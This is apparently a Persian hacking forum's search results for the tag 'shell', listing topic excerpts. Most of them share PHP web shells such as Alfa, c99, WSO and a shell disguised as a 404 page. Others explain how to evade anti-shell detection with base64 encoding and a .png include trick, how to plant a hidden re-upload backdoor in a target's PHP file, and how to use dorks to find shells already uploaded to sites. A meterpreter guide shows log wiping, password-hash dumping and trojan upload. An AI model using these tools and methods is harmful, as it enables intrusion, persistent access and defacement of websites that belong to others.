جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'شل'.
29 نتیجه پیدا شد
-
سلام دوستان خواستم این شل رو که پر از امکانات مختلف هستش و به شخصه خودم خیلی جاها ازش استفاده کردم رو بزارم اسم شل alfa هستش ورژن 3 (آخرین ورژن) باید استفاده کنید تا به قابلیت های این شل پی ببرید 😧 alfav3-encoded.rar
- 4 پاسخ
-
- انکود شده
- encoded shell
-
(و 6 مورد دیگر)
برچسب زده شده با :
-
اموزش کامل اسکریپت نویسی مجموعه اموزشی اسکریپتینگ از سه بخش اصلی تشکیل میشه بخش اول کامند لاین و پیش نیاز های اسکریپت نویسی رو تشکیل میده در بخش دوم اسکریپت نویسی رو از پایه شروع میکنیم و تا سطح متوسط پیش میریم (صفحه دوم) و در بخش سوم مباحت مربوط به اسکریپت نویسی پیشرفته رو دنبال میکنیم لطفا به هیچ عنوان اسپم ندید و اگر امری بود در پیام خصوصی عنوان کنید __________________________________________________________________________________________________________________ بخش اول - قسمت یکم یکی از راه های وصل شدن به CLI یا command line interface یا همان رابط کاربری خط فرمان ، استفاده از لینوکس بدون دسکتاپ هستش درست مثل لینوکس در دوران قدیمش که شما فقط با یک محیط ویژال کنسول سر و کار داشتید برای ویژال کنسول کردن محیط گرافیکی هم میتونیم از Alt + Ctrl + F1 / F7 استفاده کنیم که هر کدوم از اف ها یک محیط ویژال کنسول مجزا برامون فراهم میکنن که مستقیم به ران لول عمیق تر وصل اند و حتی میتونیم همزمان با یوزر های مختلف لاگین کنیم هر کدوم از این محیط های کنسولیه مجزا شماره ی مربوط به خودشون رو دارن که در tty دیده میشه مثلا وقتی شما با Alt + Ctrl +F2 دومین محیط کنسولیه خودتون رو باز میکنید و با همون یوزر یا یوزر دیگه ای لاگین میکنید در اولین خط مقدار tty2 رو میتونید ببینید که نشون میده شما در دومین محیط کنسولیتون قرار دارید برای شیفت کردن بین tty ها از همون Alt + Ctrl + F با شماره ی tty مورد نظر استفاده میشه تو این مورد F1 ( برگشتن از محیط کنسولیه دوم ( با مقدار tty2 ) به محیط کنسولیه اولیه ( با مقدار tty 1 ) ) بعد از شیفت کردن بین کنسول ها ، تمام کنسول ها با هر یوزری که دارن در حالت لاگین میمونن و اعمالی که باهاشون انجام شده هم دست نخورده باقی میمونه که این موضوع انسجام و انعطاف قابل توجهی به وجود میاره ما میتونیم درون محیط های کنسولی هم از text mode console terminal برای کاستومایز کردن محیط کنسول استفاده کنیم با استفاده از دستور setterm برای مثال من چند مورد رو قرار میدم ، که البته خودتون با help میتونید لیست متنوع دستور setterm رو ببینید setterm -background black white red blue green yellow magenta cyan تغیر رنگ پس زمینه به یکی از رنگ هایی که اسمش رو نوشتم setterm -foreground green تغیر رنگ متن به سبز ( یا هر رنگی که اسمش رو بنویسید ) inversescreen on or off برعکس کردن رنگ زمینه و متن store ذخیره ی تغیرات reset برگشت به حالت پیش فرض روش بعدی وصل شدن به شل استفاده از ترمینال های گرافیکی از داخل محیط دسکتاپ هستش این ترمینال ها روی کنسول کار میکنن ولی از داخل محیط گرافیکی دسکتاپ ترمینال های مختلفی در محیط گرافیکی وجوده که هر کدوم اپشن های خودشون رو دارن ، ولی چون کار اصلیه مارو شل ها انجام میدن و این ترمینال ها صرفا رابط هستن ، استفاده از هر کدومشون بیشتر جنبه ی سلیقه ای داره در زیر من لیست پر استفاده هاشون رو با سایت هاشون برای علاقه مندان میزارم Eterm [Hidden Content] Final Term [Hidden Content] GNOME Terminal [Hidden Content] Guake [Hidden Content] Konsole Terminal [Hidden Content] LillyTerm [Hidden Content] LXTerminal [Hidden Content] mrxvt [Hidden Content] ROXTerm [Hidden Content] rxvt [Hidden Content] rxvt-unicode [Hidden Content] Sakura [Hidden Content] st [Hidden Content] Terminator [Hidden Content] Terminology [Hidden Content] tilda [Hidden Content] UXterm [Hidden Content] Wterm [Hidden Content] xterm [Hidden Content] Xfce4 Terminal [Hidden Content] Yakuake [Hidden Content] خوب دوستان این قسمت بیشتر جنبه ی مقدمه ی بخش اول و اشنایی علاقه مندان با کنسول رو داشت به همین دلیل سعی کردم خیلی کوتاه و خلاصه توضیحش بدم ، در قسمت دوم دستورات خط فرمان رو شروع میکنیم
- 24 پاسخ
-
- اسکریپتینگ
- شل
- (و 19 مورد دیگر)
-
اصطلاحات هک و امنیت
Zed پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
× حفره امنیتی و یا همان باگ چیست ؟ » به نقص ها و سهل انگاری های برنامه نویسان، طراحان وب سایت ها، در کارهای خود به جای میگذارند، نفوذگر آنها را پیدا کرده و از طریق این حفره ها اقدام به نفوذ میکند را باگ می گویند ! × تارگت چیست ؟ » معنی اصلی این کلمه یعنی هدفی که از قبل تعیین شده، به طور مثال نفوذگر پس از جمع آوری کامل اطلاعات از یک وب سایت فهمیده است که این وب سایت حفره امنیتی دارد و میتواند از طریق این حفره ها و باگ ها اقدام به نفوذ کند و آن را هدف و یا تارگت خود قرار میدهد ! × اکسپلویت چیست ؟ » به یکسری کد های مخرب که توسط مهاجم و یا همان نفوذگر نوشته میشود را اکسپلویت می نامند. × پیلود چیست ؟ » به یکسری کد های مخرب وظیفه انتقال پکتهای ارتباطی بین دو کامپیوتر یا چندبن کامپیوتر به صورت غیر مجاز را دارند پیلود میگویند. × کیلاگر چیست ؟ » نرم افرار و یا برنامه ای برای دسترسی به تمامی کلمات و یا حروفی که بر روی صفحه کلید تارگت تایپ میشود را ذخیره و برای نفوذگر ارسال میشود،این کلمات میتوان از انواع آدرس ها مانند حساب های بانکی، پسورد ها و را در نظر گرفت ! × بایپس چیست ؟ » به معنای دور زدن هست یعنی هکر با روش های خاصی موانع امنیتی را دور میزند ! × کلاینت چیست ؟ » سیستم های که از یک سرور خدمات دریافت میکنند را کلاینت های می نامند، برای مثال شما یک کلاینت هستید ! × شل چیست ؟ » در هک هنگامی که هکر با استفاده از ابزارها و کارهای خود میتونه به سیستم قربانی نفوذ کنه و کنترل سیستم رو بدست بگیره اصطلاحا میگن شل گرفته و میتونه تصمیمات خودش رو عملی کنه ! × دیفیس چیست ؟ » وقتی یه هکر سایتی رو هک میکنه ، نمای صفحه اصلی (یا بقیه صفحه های) سایت رو تغییر میده و ممکنه اسم خودش رو هم درج کنه و مسئولیت هک سایت رو بپذیره به این صفحه دیفیس پیج میگویند ! × مس دیفیس چیست ؟ » مس دیفیس هم مثل همون دیفیس هست با این فرق که شما وقتی تمام سایت های متعلق به یک سرور خاص رو دیفیس کنید میگویند مس دیفیس انجام داده اید ! × بک دور چیست ؟ » در هک وقتی یه هکر به سیستمی نفوذ کرد عمدا راه دومی برای نفوذهای بعدی در سیستم هک شده قرار میده تا اگه یوقت احیانا راه نفوذ فعلی شناسایی و بسته شد بتونه با کمک در پشتی که ایجاد کرده دوباره نفوذ کنه ! هماهنگ شده با ادمین عزیز @proxy-
- اصطلاحات هک و امنیت
- تارگت
- (و 19 مورد دیگر)
-
با سلام خدمت کاربران و مدیران سایت گارد ایران در این تاپیک قصد دارم به شما آموزش دور زدن آنتی شل رو بدم که شاید بیشتر جاها بدردتون بخوره . روش اول : دو بار encode کردن شل با base64 که می توانید از این سایت کمک بگیرید . --------------- روش دوم : شل رو به فرمت png تغییر دهید . یک فایل دیگر با فرمت php بسازید و این کد رو در اون قرار دهید : <?php include_once("shell.png"); ?> تا سایت اون فایل رو با فرمت php بخونه . --------------- پیشنهاد می کنم هر دو روش رو در کنار هم انجام دهید تا انتی شلر بهتر بایپس شود . امیدوارم از این تاپیک لذت برده باشید و بدردتون بخوره و تاپیک خوبی رو گذاشته باشم .
- 1 پاسخ
-
- shell
- anti shell
-
(و 11 مورد دیگر)
برچسب زده شده با :
-
با سلام خدمت دوستان عزیز گاردایران . من توی کانال های مختلف هک ، لینوکس ، برنامه نویسی .. هستم و بعضی ها رو می بینم که تم ترمینالشون رو عوض می کنن که خیلی جذابیت می ده به کار ما هکر ها . پس منم رفتم نحوه تغییر تم رو یاد گرفتم ، توی انجمن که گشتم چنین پستی نبود ، پس گفتم اموزشش رو بزارم . خب ابتدا دستورات زیر به ترتیب می زنید : > sudo apt install figlet > sudo apt install lolcat > sudo apt install gem > sudo apt install ruby Figlet : برای اینکه بتونیم یک متن رو به صورت بزرگ برای مثال Mr.MSA رو زمانی که ترمینال باز می شود نمایش دهیم از figlet استفاده می کنیم . که فونت های مختلف در اینجا موجود است. lolcat : برای اینکه به متن خودمون رو به صورت رندم رنگ هایی رو بدیم از lolcat استفاده می کنیم . Gem & Ruby : پیشنیاز های lolcat . حالا برای اینکه بتونیم از lolcat استفاده کنیم از این دستور استفاده می کنیم : gem install lolcat و برای اینکه سیستم ابزار ها رو بشناسه از این دستور استفاده کنید : sudo apt update ---------------------------------------------------------------------------------------------------------------- خب حالا شما با دستور زیر می تونید متن خودتون رو بصورت بنر و رنگ های رندم نمایش دهید : figlet MR.MSA | lolcat خب حالا می خواهیم برای همیشه زمانی که ترمینال رو باز می کنیم این متن رو نمایش بده . ابتدا oh my zsh رو نصب کنید : نصب با curl : sh -c "$(curl -fsSL [Hidden Content])" نصب با wget : sh -c "$(wget [Hidden Content] -O -)" نصب با github : [Hidden Content] نصب تم در zsh : بعد از نصب zsh شما ابتدا این دستور رو می زنید : cd ~ بعد این دستور برای ادیت کردن فایل .zshrc vim .zshrc در اون فایل دنبال این کلمه بگردید : ZSH_THEME="robbyrussell" اون کلمه ای که بین " است نام تم zsh هست که به صورت پیش فرض robbyrussell هست . برای تغییر دادنش شما باید به این ادرس بروید : [Hidden Content] و بر اساس عکس هایی که گذاشته شده نام تم رو انتخاب کنید و در این قسمت قرار دهید : ZSH_THEME=" نام تم مورد نظر " نمایش بنر دلخواه با رنگ رندم : برای اینکار در همان فایل .zshrc در خط اخر این دستور رو بزاید : figlet 'Mr.MSa' | lolcat و به جای Mr.MSA متن مورد نظر خودتون رو بنویسید . حالا این کلید ها رو به ترتیب روی کیبورد برای خارج شدن از ادیتور vim و سیو کردنش فشار دهید : 1) esc 2) : 3) w 4) q حالا در قسمت edit profile ترمینال در قسمت کامند شل پیش فرض که bash هست رو به zsh تغییر بدید یعنی : /bin/bash به این تغییر می کنه : /bin/zsh حالا یک بار از ترمینال خارج بشید و دوباره ترمینال رو باز کنید و مشاهده می کنید که ترمینال شما نسبت به روز اول زیبا تر شده است . و می توانید با دستورات zsh چیز های دیگه هم بزارید یا حتی همین دستور رو چند بار دیگه بنویسید با متن های مختلف . این یه فایل PDF آموزشی است که دوست عزیز دیفیسرمون HCSH4C39 نوشته که می تونید به همراه این تاپیک از این آموزش هم استفاده کنید : HCSH4C39.pdf موفق و پیروز باشید .
- 1 پاسخ
-
- زیبا سازی ترمینال
- پاروت
-
(و 32 مورد دیگر)
برچسب زده شده با :
- زیبا سازی ترمینال
- پاروت
- terminal theme
- mr.msa
- hacking
- edit theme
- hack
- ubuntu
- parrot
- kali
- linux
- debian
- terminal
- زیبا سازی ترمینال لینوکس .
- زیبا سازی لینوکس
- oh my zsh
- zsh
- lolcat
- ohmyzsh
- figlet
- ruby
- gem
- shell
- شل
- ابزار کالی لینوکس
- ابزار لینوکس
- زبان برنامه نویسی ruby
- کالی
- دبیان
- لینوکس
- مک
- ترمینال مک
- زیبا سازی ترمینال مک
- mac os x
-
100 نمونه از اسکریپت های نوشته شده با Bash با توجه به اتمام بخش های اول و دوم از اموزش اسکریپت نویسی با شل بش ، و همچنین توانایی خوندن و نوشتن بخش زیادی از انواع اسکریپت ها ، این نمونه هارو براتون قرار دادم تا به عنوان یه بخش تمرینی مورد استفاده قرار بگیره لینک دانلود : [Hidden Content]
-
همونطور که میدونید meterpreter یکی از payload های تعاملی و قدرتمند metasploit هستش که از اهمیت مخصوصی برخورداره اینجا ما با تعدادی از دستورات پرکاربرد و عمومیش با یک توضیح مختصر اشنا میشیم و از خروجی دستورات به عنوان مثال اطلاعات کسب میکنیم : HELP این دستور همونطور که از اسمش مشخصه برای دیدن منوی help در meterpreter استفاده میشه : meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session channel Displays information about active channels ...snip... BACKGROUND این دستور برای ارجاع سیشن فعلی به بک گراند استفاده میشه ، و پس از اون دستورات در msf اجرا میشن برای برگشتن به سیشن کافیه دوباره باهاش تعامل برقرار کنید : meterpreter > background msf exploit(ms08_067_netapi) > sessions -i 1 [*] Starting interaction with 1... CAT مثل بش شل لینوکس محتوای فایلی که به عنوان ارگمان بهش داده بشه رو نمایش میده : meterpreter > cat Usage: cat file Example usage: meterpreter > cat edit.txt guardiran digital security team CD and PWD این دو دستور هم باز مثل بش شل برای تغیر مسیر و نمایش ادرس مسیر فعلی در فایل سیستم استفاده میشه : meterpreter > pwd c:\ meterpreter > cd c:\windows meterpreter > pwd c:\windows meterpreter > CLEAREV با استفاده از این دستور در ویندوز لاگ های امنیتی ، سیستمی و اپلیکیشن ها پاکسازی میشن : meterpreter > clearev [*] Wiping 97 records from Application... [*] Wiping 415 records from System... [*] Wiping 0 records from Security... DOWNLOAD موقع استفاده از دستور دانلود باید نوع سیستم عامل تارگت در نظر گرفته بشه ، به خاطر تفاوت نوع ادرس های فایل سیستم هاشون : meterpreter > download c:\\boot.ini [*] downloading: c:\boot.ini -> c:\boot.ini [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini EDIT با این دستور میتونیم در هاست تارگت یه فایل برای نوشتن باز کنیم : meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop ======================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- . ...snip... . 100666/rw-rw-rw- 0 fil 2012-03-01 13:47:10 -0500 edit.txt meterpreter > edit edit.txt EXECUTE با استفاده از این دستور میتونیم در هاست تارگت فایل و کامند اجرا کنیم : meterpreter > execute -f cmd.exe -i -H Process 38320 created. Channel 1 created. Microsoft Windows [Version 5.1.2600] (C) Copyright Microsoft Corp. C:\WINDOWS\system32> GETUID با این دستور یوزری که در هاست تارگت شل رو اجرا میکنه نمایش داده میشه : meterpreter > getuid Server username: NT AUTHORITY\SYSTEM HASHDUMP با این دستور محتوای دیتابیس SAM رو میتونیم دامپ کنیم : meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3::: dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9::: victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d::: IDLETIME این دستور ثانیه هایی که یوزر ریموت روی هاست idle شده رو نمایش میده : meterpreter > idletime User has been idle for: 5 hours 26 mins 35 secs IPCONFIG این دستور اینترفیس و ادرس های سخت افزاری و نرم افزاری ماشین هدف رو نمایش میده : meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport Hardware MAC: 00:0c:29:10:f5:15 IP Address : 192.168.1.104 Netmask : 255.255.0.0 LPWD and LCD این دستورات جالب همون cd و pwd هستند با این تفاوت که لوکال اجرا میشن ، مثال زیرو ببینید : meterpreter > lpwd /root meterpreter > lcd MSFU meterpreter > lpwd /root/MSFU meterpreter > lcd /var/www meterpreter > lpwd /var/www LS مثل نمونه شل برای لیست کردن فهرست استفاده میشه : meterpreter > ls Listing: C:\Documents and Settings\victim ========================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2019 . 40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2019 .. 100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2019 .recently-used.xbel 40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2019 Application Data ...snip... PS این دستور هم مثل نمونه بش شل برای لیست کردن پروسه ها کاربرد داره : meterpreter > ps Process list ============ PID Name Path --- ---- ---- 132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe 152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 288 snmp.exe C:\WINDOWS\System32\snmp.exe ...snip... SEARCH همونطور که از اسمش مشخصه برای جستجو استفاده میشه ، مثال : meterpreter > search -f autoexec.bat Found 1 result... c:\AUTOEXEC.BAT meterpreter > search -f sea*.bat c:\\xamp\\ Found 1 result... c:\\xampp\perl\bin\search.bat (57035 bytes) SHELL با استفاده از دستور شل ، یک شل استاندارد از ماشین تارگت دریافت میکنیم : meterpreter > shell Process 39640 created. Channel 2 created. Microsoft Windows [Version 5.1.2600] (C) Copyright Microsoft Corp. C:\WINDOWS\system32> UPLOAD موقع استفاده از این دستور هم مثل دستور دانلود باید نوع سیستم عامل تارگت برای جلوگیری از بروز خطا در نظر گرفته بشه ، با توجه به تفاوت ادرس های فایل سیستم هاشون : meterpreter > upload evil_trojan.exe c:\\windows\\system32 [*] uploading : evil_trojan.exe -> c:\windows\system32 [*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe WEBCAM_LIST با استفاده از این دستور یه لیست از وبکم های متصل به تارگت دریافت میکنیم : meterpreter > webcam_list 1: Creative WebCam NX Pro 2: Creative WebCam NX Pro (VFW) WEBCAM_SNAP در این دستور با انتخاب و مشخص کردن وبکمی که با دستور قبل شناسایی کردیم میتونیم با وبکم موردنظر عکس بندازیم ، که با اپشن h- میتونیم از مزایای مختلفش مطلع بشیم : meterpreter > webcam_snap -i 1 -v false [*] Starting... [+] Got frame [*] Stopped Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg
-
- meterpreter
- payload
-
(و 8 مورد دیگر)
برچسب زده شده با :
-
شل نوستالوژیکه 404 صفحه اول این شل یه اررور پوششیه که صفحه مورد نظر پیدا نشد (برای مخفی سازی) که برای گذشتن از این صفحه پسورد لازمه (وارد کردن پسورد در کادر مخفی) هم پسورد به صورت رمزنگاری شده ، و هم صفحه ارور (با توجه به صفحات تارگت) قابل تعویض هستند دستور دانلود : git clone [Hidden Content] تصویر و مختصر توضیح برای اشنایی بیشتر با شل : [Hidden Content]
-
- shell 404
- shell script 404
-
(و 11 مورد دیگر)
برچسب زده شده با :
-
سلام خدمت دوست عزیز گارد ایران. در این تاپیک قصد دارم بهترین و پرکاربرد ترین شل هارو قرار بدم. امیدوارم لذت ببرین. اولین شل:adminer adminer-3.6.3.rar
- 59 پاسخ
-
- شل antichat
- cw شل
-
(و 8 مورد دیگر)
برچسب زده شده با :
-
با سلام جدید ترین نسخه شل آلفا رو میخوام براتون بزارم دو نسخه ENCODE وDECODE شده دریافت فایل alfa3.0.2ENCODE.php دریافت فایل alfa3.0.2DECODE.php
-
شل.rarبا سلام نزدیک ده تا شل پر کاربرد برای شما اماده کردم ا میدوارم خوشتون بیاد
-
به نام ایزد منان بدون مقدمه میرم سر اصل مطلب هدف از ایجاد این تاپیک این هست که شما بتوانید به عنوان شخصی حرفه ای کار هاستینگ و سرور انجام بدید و کسب در آمد بالایی داشته باشید. سر فصل ها : 0.1 مقدمه 0.2 وب سرور چیست و چگونه باید آن را ساخت 0.3 چگونه سروری مناسب است 1.0سرور 1.1 سرور رایگان 1.2 علم سرور هکینگ ، گنج است. 1.3 کانفیگ اولیه سرور 1.4 aws=>amazon web survices 1.5 apche Http Server =>windows and linux 1.6 iis for windows 2.7 سرور شخصی خودتان را بسازید 2.8 سرور مجازی شخصی خودتان را بشازید 3.0 هاستینگ 3.1 ساخت localhost در ویندوز و لینوکس 3.2 استفاده از static ip به جای localhost 3.3 تبدیل سرور به هاست دانلود. آموزش ها به صورت متنی و در صورت افاقه نکردن ، ویدیویی همراه با صدا خواهد بود. نظرات فراموشتنون نشه. تا درودی دیگر بدرود.
-
هک وردپرس با باگ آپلود فایل - Arbitrary file upload
mownten پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
سلام. یه آموزشی تصویری تهیه کردم در خصوص استفاده از باگ افزونه ی Dreamwork gallery توی وردپرس که میشه باهاش فایل مدنظر رو توی سایت آپلود کرد. رمز فایل : guardiran.org موفق باشید 1-Wordpress - arbitrary file upload - GuardIran.part1.rar 1-Wordpress - arbitrary file upload - GuardIran.part3.rar 1-Wordpress - arbitrary file upload - GuardIran.part2.rar-
- dreamworkgallery
- wordpress
-
(و 8 مورد دیگر)
برچسب زده شده با :
-
اینم از لقمه آماده اگر کسی رفته باشه جایی شل c99 آپلود پیدا کرده باشه چطور ما هم اون شل رو پیدا کنیم؟ به دلیل طولانی بودن لیست، توی یه فایل متنی گذاشتمشون. رمز عبور : guardiran.org Shell c99 google dorks - guardiran.org.rar
-
- شل آپلود شده
-
(و 8 مورد دیگر)
برچسب زده شده با :
-
سلام ../ یه مدت پیش یه شلی طراحی شده بود که در بخش زیر زمین نگه داری میشد این تصمیمو گرفتم که این شل رو پابلیک کنم تا دوستان هم بتونن استفاده کافی رو ببرن یا حـ ـق ../ پیوستـ شد priv8.php
-
دیفیس سایت با اپلود شل
Mr.Bl4cK پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
در این اموزش: دیفیس سایت با اپلود شل رو اموزش میدم تارگت همون dvwa هست که داخل یه هاست اپلود کردم و شما هم میتونین ازش استفاده کنین mr-bl4ck.byethost32.com هر کاری کردین بعدش درستش کنین تو رو خدا اگر هم دیدین کار میکنه بهم بگین تا برم درستش کنم کپچا هم براش گرفتم و الان قسمتش کار میکنه در ضمن قسمت باگ csrf به درستی کار میکنه اما پسورد رو عوض نمیکنه (خودم تغییرش دادم:) اگر خواستین استفاده کنین و یوزر و پس خواست: user: guardiran pass: guardiran امیدوارم از اموزش لذت ببرین Screencast_09-03-2017_05:53:32_AM.mp4 -
معنی هک: هک به معنی سود بردن از یک روش سریع و هوشمندانه برای حل یک مشکل در رایانه میباشد. در علوم مربوط به رایانه معنی هک گاه مساوی معنی کرک (crack) که رمزگشایی است نیز عنوان میشود. در گفتگوهای امروزی هک به معنی نفوذ به یک سیستم رایانهای است؛ و کرک نیز به معنی رمزگشایی است و کراکر (به انگلیسی: Cracker) به فرد گشاینده رمز میگویند. باگ چیست؟ باگ نوعی خطا یا اشتباه در اجرای نرم افزار است که موجب نتایج اشتباه یا اجرا نشدن نرم افزار میشود. علت این اشکالات میتواند اشتباه در هنگام برنامه نویسی باشد. شرکت های سازنده نرم فزارها برای حل این مشکل قبل از ارائه نسخه نهایی نسخههایی تحت نام بتا یا آلفا انتشار میدهند تا افرادی آنها را بررسی کنند و این باگها را گزارش کنند. و هکر میتواند با استفاده از باگ به نرمافزار نفوذ کرده و به هدف خود برسد. شل چیست؟ شل یک ابزار برنامه نویسی شده است که هکر با آپلود کردن اون روی سایت می تواند کارهای مورد نظر خودش رو مانند حذف یا دانلود فایلها و خواندن اطلاعات دیتابیس یا ... رو انجام دهد سی ام اس چیست؟ سی ام اس یا cms سیستم مدیریت محتوا مانند جوملا و وردپرس و..... پورت چیست؟ به راه های ورودی و خروجی اطاعات در سیستم پورت گفته میشه که مانند درهای یک خونه هستند اکسپلویت چیست؟ زمانی که هکر یک باگ رو کشف میکنه برای اینکه بتواند دفعه بعد با سرعت بیشتری نفوذ رو انجام بدهد یک کد مینویسد که عمل نفوذ رو انجام دهد که به آن اکسپلویت گفته می شود. آی پی چیست؟ به آدرس یک سیستم در بستر اینترنت یا شبکه آی پی ip گفته میشود دفیس و مس دفیس چیست؟ زمانی که صفحه سایت مورد نفوذ تغیر پیدا کرد در اصطلاح میگویند که سایت دفیس شده است حال اگر صفحه چند سایت با آی پی های یکسان تغییر پیدا کند میگویند که مس دفیس اتفاق افتاده است بایپس چیست؟ به عبور کردن از موانع بایپس میگویند مانند وقتی به سایتی نفوذ می کنید که safe mode آن فعال هست برای اجرا کردن دستورات خود بر روی شل به مشکل بر می خورید و دلیل آن هم وجود firewall سرور هست . برای اینکه بتوانید دستورات خود را بر روی شل اجرا کنید ولی firewall گیر ندهد باید آن را bypass (دور زدن firewall ) کنید . اگه چیزی رو از قلم انداختم بگید فقط دوستان لطف کنید به چت روم تبدیل نکنید اینجا رو ممنون
-
- دفیس
- ip چیست؟
-
(و 43 مورد دیگر)
برچسب زده شده با :
- دفیس
- ip چیست؟
- آی پی چیست؟
- ip
- آی پی
- اکسپلویت چیست
- اکسپلویت
- پورت
- پورت چیست
- سی ام اس چیست
- cms چیست
- cms
- سی ام اس
- شل چیست
- شل چیست؟
- شل
- هک چیست
- باگ چیست
- باگ
- معنی هک
- هک چیست؟
- آموزش هک
- آموزش
- کلمات هک
- کلمات اختصاصی هک
- هک را از کجا باید آغاز کرد
- هک را از کجا باید آغاز کرد؟
- چگونه هکر شویم؟
- هکر
- چگونه هکر شویم
- از کجا هک را شروع کنیم
- شروع هک
- تازه واردها
- اصطلاحات هک برای تازه واردها
- اصطلاحات هک
- اصطلاح
- هک
- دفیس یعنی چه؟
- دفیس چیست؟
- مس دفیس
- مس دفیس چیست؟
- بایپس
- بایپس چیست؟
- bypass
- bypass چیست؟
-
درخواست شل
proxy پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
سلام ببخشید این بخش سوالات و جوابها رو دوباره رو به راه کنید که ما تو بخش آزاد سوالها رو نپرسیم دوستان کسی اگه چند تا شل asp داره برام قرار بده . خودم چند تا دارم ولی خیلی داغونن و اصلا به درد نمیخورن- 5 پاسخ
-
- درخواست شل
- شل
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
آموزش شل WSO 2.3
BlackErroR پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
بسم الله الرحمن الرحیم باسلام در این قسمت شما با شل WSO 2.3 اشنا میشید بصورت کامل. دوستانی هم که کار با این شل رو بلدن خواهشا بزارید تا علممون بره بالا. سوالی داشتین درخدمتم. info_wso_2.3.rar -
سوال: چگونگی bypass و ارسال شل به آپلودر سایت
vahidpour پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
سلام دوستان با استفاده از گوگل دورک میتوان به راحتی آپلودرهای مختلف رو مثل fckeditor به وفور پیدا کرد اما مشکل اینه همشون اجازه ارسال شل ویا فرمت ناشناخته نمیدن و فرمتهای خاص مثل txt رو فقط میشه فرستاد. حال برای bypass چه راهکاری پیشنهاد میدهید؟ معمولا پیشنهاد میشه، فرمت شل را به عکس تبدیل کرد و بعد با ابزارهایی مثل burpsuite یا live http header در هنگام ارسال فرمت فایل را به php تبدیل کرد اما هر چی اجرا میکنم باز پیام فرمت مجاز نیست میده چون اجازه ارسال فرمتهای ناشناخته نمیدهد از htaccess هم نمیتوان استفاده کرد -
سلام دوستان یک شل اسکریپت برای تیم امنیتیمون ریکد کردم ! این مدت به همین دلیل یکمقدار فعالیتم کم شده بود ! امیدوارم ازم بپزیرید این شلو ! ریکد شده از شل داعس هکر رمز شل guardiran صفحه ورودیش 404 هست نحوه ورود : این هم فضای شل یا حـ ـق ../ <--------به زودی با ورژن دوم میترکونیم--------> 1TED.php
-
آموزش شلر C99 به روشی جدید!!
Ironknight پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
سلام خدمت عزیزان. امروز میخوام بهتون شلر c99 رو آموزش بدم. خوب خیلی از دوستان تازه وارد که قراره از شلر استفاده کنن باید یه تارگت داشته باشن تا بتونن شلر رو امتحان و دستکاری کنند. به قول معروف هر بلایی که میخوان سر شلر بیارن تا یادش بگیرن. خوب به نظر شما چه تارگتی بهتر از سیستم خود ما؟؟؟؟ نه اینترنت لازم داره و نه هزار تا دنگ و فنگ دیگه. تو این آموزش نحوه استفاده از شلر رو در ویندوز آموزش میدم. دوستان همکاری کنند لطفا: نرم افزار مورد نیاز در فیلم رو هم میتونین خیلی راحت با یه جست و جو تو گوگل پیدا کنید. رمز فایل ها: guardiran.org C99.part01.rar C99.part02.rar C99.part03.rar شعار این پست: فدای صفای ایرونی هااا -
آپلود مخفی شل یا فایل
Goodzilam پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
درود یه آموزش مخصوص برای کاربران عزیز گاردایران + سوپرایز شما با انجام این کار ها میتونید در صورتی که شلتون پاک شد به صورت مخفی دوباره شلتون رو اپلود کنید یا هر فایل دلخواهی رو اپلود کنید 1.خب دوستان فایل پیوست شده رو دان کنید. 2.توسط شل یکی از فایل های تارگت رو انتخاب کنید که فرمتش html یا php باشده سعی کنید فایل تو دایرکتوری اصلی نباشه و یعنی داخل: /public_html/ نباشه و حتما داخل : /public_html/test/ باشه. 3.بعد سپس فایل انتخاب شده رو به حالت ادیت (edit) در بیارید و اخر فایل , کدی که درون فایل پیوست شده هست رو کپی و پیست کنید و فایل رو سیو کنید. در این جا به طور مثال فایل انتخاب شده Goodzilam.php نام داره. خب حالا کافیه فایل انتخاب شده رو در مرورگرتون باز کنید: target.com/test/Goodzilam.php و اخر ادرس کد زیر رو اضافه کنید: cmd=up? یعنی به این صورت: target.com/test/Goodzilam.php?cmd=up و بعله میبینید که صفحه 